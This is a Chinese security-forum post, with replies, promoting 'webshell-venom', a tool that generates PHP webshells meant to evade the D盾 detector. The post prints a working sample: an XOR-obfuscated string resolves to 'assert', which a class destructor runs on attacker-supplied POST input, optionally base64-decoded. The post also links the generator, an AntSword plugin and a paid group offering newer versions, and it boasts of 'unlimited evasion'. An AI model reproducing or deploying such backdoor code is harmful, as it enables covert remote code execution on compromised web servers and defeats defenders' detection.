用户
搜索
  • TA的每日心情

    2018-8-18 10:11
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    版主

    Rank: 7Rank: 7Rank: 7

    3

    主题

    10

    帖子

    101

    魔法币
    收听
    0
    粉丝
    2
    注册时间
    2018-7-24
    发表于 2019-8-17 11:48:21 41733
    本帖最后由 yzddmr6 于 2019-9-16 15:59 编辑

    前前前言

    平常很少在春秋发文章,发现还有一些同学不知道webshell-VENOM这个免杀神器

    如果告诉你生成免杀D盾一句话木马只需要两步你相信吗

    第一步:下载脚本

    第二步:运行脚本

    哈,就可以无限免杀d盾了

    想知道如何实现的请往下看

    项目地址

    原项目地址

    https://github.com/yzddmr6/webshell-venom

    蚁剑插件版

    https://github.com/yzddmr6/as_webshell_venom

    前言

    首先再次感谢大家对webshell-venom的支持!

    星球自开启以来已经源源不断有各路大佬加入

    并且一起交流了很多的思路跟想法

    为了不辜负大家的期望

    自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更

    项目在今天也达到了700个星

    image

    所以特地推出webshell-venom 3.2版本

    webshell-venom 3.2 的蚁剑插件版也已经在蚁剑商店上市

    image

    原来已经有的点击更新即可

    3.2是github公开版,所有人都可以下载

    (webshell-venom  3.x系列 不支持php7环境,如果需要星球内部版4.0请点击下面链接)

    https://yzddmr6.tk/posts/webshell-venom-notice/

    正文

    样例

    其实我当时还纠结是命名为3.2还是3.3

    因为在 https://yzddmr6.tk/posts/webshell-venom-3-1-3-2/

    这篇帖子里虽然说了3.2的更新,但是实际上并没有发布

    后来研究了一下还可以用另一种方式绕过

    就是套一个函数,把异或的返回值通过类里的函数进行传递。

    具体的可以看一下下面的代码

    <?php 
    class  TIPD{ 
    function AJZN(){
    $upf='Q'^"\x30";
    $imp='R'^"\x21";
    $rec='u'^"\x6";
    $yba='/'^"\x4a";
    $ebi=':'^"\x48";
    $pvu='D'^"\x30";
    $VDMX=$upf.$imp.$rec.$yba.$ebi.$pvu;
    return $VDMX;}function __destruct(){
    $UNOF=$this->AJZN();
    @$UNOF($this->FJ);}}
    $tipd=new TIPD();
    @$tipd->FJ=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
    ?>

    因为我说过D盾其实还是不认识异或的,至少还是不敏感。

    用类里函数传参的方法也是一个很好的手段。

    绕过的办法有很多,我只是提供一个demo。

    使用方法

    https://github.com/yzddmr6/webshell-venom/tree/master/php

    蚁剑插件

    image

    老套路,直接生成

    过盾截图

    一键免杀D盾

    image

    image

    更新后效果还不错,但是缺点就是有点长。。。

    最后

    免杀这一块不同于其他工具

    其实很多人都有很好的方法,只不过是大家都不愿意分享

    因为看看论坛里的帖子大家就会发现一个真理

    分享就意味着失效

    我一直把免杀分享出来也是为了让网络安全上大家能开阔思路,更进一步

    建立圈子也是为了创造一个更好的交流环境。共同提高

    里面也有土司管理,圈子管理,各路大佬讨论的火热。

    也感谢私信我支持我的兄弟

    欢迎小伙伴们入圈一起交流,有问题也可以私戳我

    不入圈也没关系,可以关注我的博客跟github

    虽然公开场合会更新的慢,但是我会一直更新下去的

    如何加入星球

    https://yzddmr6.tk/posts/webshell-venom-notice/

    历史文章

    1.利用随机异或无限免杀d盾: https://yzddmr6.tk/2019/08/11/webshell-venom-1-0/

    2.利用随机异或无限免杀d盾 更新至2.0 https://yzddmr6.tk/2019/08/11/webshell-venom-2-0/

    3.无限免杀D盾脚本之aspx https://yzddmr6.tk/2019/08/11/webshell-venom-aspx/

    4.一键吊打D盾(免杀一句话无限生成) https://yzddmr6.tk/2019/08/12/webshell-venom/

    5.一键吊打D盾(webshell-venom 3.0 发布) https://yzddmr6.tk/2019/08/12/webshell-venom-3-0-1/

    6.webshell-venom 3.1/3.2 紧急更新日志 https://yzddmr6.tk/2019/08/13/webshell-venom-3-1-3-2/

    7.webshell-venom 4.0 发布:这一次,干翻一切 https://yzddmr6.tk/2019/08/13/webshell-venom-4-0/


    https://yzddmr6.tk/
    哇,小白前来观摩大佬思路
    使用道具 举报 回复
    发表于 2019-8-24 00:26:54
    你发出来就快凉凉了
    ―无名小卒―
         RG路过
           (-.-)
    ――――――
    使用道具 举报 回复
    发表于 2019-9-2 11:31:44
    Red_G 发表于 2019-8-24 00:26
    你发出来就快凉凉了

    重要的不是脚本而是思路
    我在脚本里提供了很多公共函数可以自己写
    觉得自己不想写的话也可以加入我的星球,里面会持续维护
    https://yzddmr6.tk/
    使用道具 举报 回复
    发表于 2019-9-3 13:15:08
    颜值担当Mr6 发表于 2019-9-2 03:31
    重要的不是脚本而是思路
    我在脚本里提供了很多公共函数可以自己写
    觉得自己不想写的话也可以加入我的星球 ...

    原来你是作者,没认出来
    ―无名小卒―
         RG路过
           (-.-)
    ――――――
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册